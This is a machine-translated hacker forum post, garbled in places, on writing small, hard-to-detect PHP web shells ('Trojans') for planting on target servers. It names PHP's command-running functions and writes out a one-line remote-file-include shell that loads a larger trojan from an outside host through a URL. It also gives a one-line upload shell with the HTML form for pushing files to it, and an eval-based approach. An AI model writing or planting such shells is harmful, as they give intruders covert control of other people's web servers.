"Edit hint": This article is only for reference study!
There is nothing special about this article, just to find a point. and gave me the same dish of friends wandering around the PHP door. Just learn PHP not a few days, I am eager to work, so there are errors and deficiencies please actively point out.
PHP is a powerful syntax for the ASP, only one: you can spy on the entire server configuration. Run cmd, upload files, etc., are very simple, now use a good php Trojan horse, no more than Angel Phpspy. Yesterday Hak_ban asked how to encrypt the PHP trojan, I have not thought, but for writing a miniature PHP trojan, I think it is difficult to be killed.
Here are a few functions that can be used as Trojans:
1. Several functions that can run external commands: System,passthru,exec,shell_exec,popen.
Example: As long as the wait to save as cmd.php and to achieve the function of running external commands. These functions can be said to be the first Wicheng PHP Trojan, so the general virtual host settings will also block these functions.
2. Remember the WDB forum style.php loophole? We can use this to make a small trojan that is difficult to be killed. As follows:
<?php include ($include);? >
|
Save it to 1.php, we can call other PHP servers that do not support. PHP Trojan Horse (such as phpspy.php) to achieve our goal: http://target.com/1.php? include=http://www.xxx.com/phpspy.php
Here http://www.918x.com does not support PHP, otherwise it will run phpspy.php on the http://www.xxx.com server instead of the target server.
3. This is still angel in Discuz 2.2F attack to give us a very good upload trojan, I did not change:
<?copy ($_files[myfile][tmp_name],$_files[myfile][name]);? >
|
After you save it as a up.php, submit the form locally:
<form enctype= "Multipart/form-data" action= http://target server/up.php "method=" POST "><input NAME=" MyFile "TYPE=" File "><input value=" submitted "type=" Submit "></form>
|
You can upload a large php trojan.
4. I have been wondering if there is an ASP with the ice Fox prodigal son of a Trojan horse like the one submitted by local form to run PHP. Finally found the function: eval, its syntax description in the PHP4 Chinese reference manual:
Grammar:
void eval (string code_str);
|
Description: This function can be used to take the value of the variable in the string, usually in the processing of data on the database. Parameter code_str is the string to be processed. It is worth noting that the string to be processed conforms to the PHP string format, with a semicolon at the end. The string that is processed using this function will be followed by the end of the PHP program.
We can save on the target host: a PHP file (I think it can be inserted in any file in PHP). It then achieves the goal by submitting locally, but unlike the ASP, when MAGIC_QUOTES_GPC = On, many characters are filtered, making the usage function much smaller.
I have done many times for this PHP trojan sheet and have no mature code yet. Also please master advice. When you write it, you will give it to everyone. But the Eval function can do a miniature PHP Trojan is no doubt.
PS: After writing, someone told me, in fact, the master has a miniature of the PHP Trojan, but not public. Hey, I am so depressed ah, the study are people have already had the results. Anyway, share my research with you, I hope to get help and advice.